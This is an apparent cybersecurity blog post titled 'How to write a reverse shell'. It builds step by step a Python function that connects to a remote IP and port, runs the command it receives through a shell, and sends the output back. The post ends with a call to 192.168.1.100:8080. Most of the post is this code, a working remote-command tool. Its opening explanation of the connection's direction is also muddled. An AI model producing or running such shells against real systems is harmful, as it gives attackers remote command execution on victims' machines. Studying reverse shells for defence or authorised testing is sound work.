top of page

CYBER & INFOSEC

"blogger, InfoSec specialist, super hero ... and all round good guy" 

DISCUSSIONS, CONCEPTS & TECHNOLOGIES FOR THE WORLD OF

JOIN THE DISCUSSION

Search

How to write a reverse shell

Oct 31, 20232 min read

A reverse shell is a type of network connection in which a remote computer establishes a connection to a local computer and allows the remote computer to execute commands on the local computer. This can be useful in a number of situations, such as when a local computer is behind a firewall and needs to connect to a remote computer, or when a local computer needs to be accessed remotely by a third party.

Here is an example of how to write a simple reverse shell in Python:


First, we will need to import the necessary libraries. In this example, we will use the socket library to create the network connection and the subprocess library to execute commands:




import socket

import subprocess



Next, we will create a function to establish the reverse shell connection. This function will take two arguments: the IP address of the remote computer and the port number that we want to use for the connection:




def reverse_shell(ip, port):

# Create a socket object

s = socket.socket()


# Connect to the remote computer

s.connect((ip, port))



Once the connection is established, we can use the subprocess library to execute commands on the local computer. For example, we can use the



subprocess.Popen() function to execute a command and capture the output:





def reverse_shell(ip, port):

# Create a socket object

s = socket.socket()


# Connect to the remote computer

s.connect((ip, port))


# Execute a command and capture the output

cmd = s.recv(1024).decode()

output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)



We can then send the output of the command back to the remote computer using the send() function:




def reverse_shell(ip, port):

# Create a socket object

s = socket.socket()


# Connect to the remote computer

s.connect((ip, port))


# Execute a command and capture the output

cmd = s.recv(1024).decode()

output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)


# Send the output back to the remote computer

s.send(output.stdout.read())

s.send(output.stderr.read())



Finally, we can call the function and pass in the IP address and port number of the remote computer to establish the reverse shell connection:




reverse_shell('192.168.1.100', 8080)



Okay, lets build on what we know and get a little more complicated by adding some encryption and error checking.



 

Recent Posts

See All

Comments

doctorchaos.com and drchaos.com is a blog dedicated to Cyber Counter Intelligence and Cybersecurity technologies. The posts will be a discussion of concepts and technologies that make up emerging threats and techniques related to Cyber Defense. Sometimes we get a little off-topic. Articles are gathered or written by cyber security professionals, leading OEMs, and enthusiasts from all over the world to bring an in-depth, real-world, look at Cyber Security. About this blog doctorchaos.com and drchaos.com and any affiliate website does not represent or endorse the accuracy or reliability of any information’s, content or advertisements contained on, distributed through, or linked, downloaded or accessed from any of the services contained on this website, nor the quality of any products, information’s or any other material displayed, purchased, or obtained by you as a result of an advertisement or any other information’s or offer in or in connection with the services herein. Everything on this blog is based on personal opinion and should be interoperated as such. Contact Info If you would like to contact this blog, you may do so by emailing ALAKHANI(AT)YMAIL(DOT)COM  

SOCIALS 

Facebook

Twitter

Instagram

Linkedin

RSS Feed

SUBSCRIBE 

Keeping you informed | Latest News

© 2018 Dr. Chaos 

bottom of page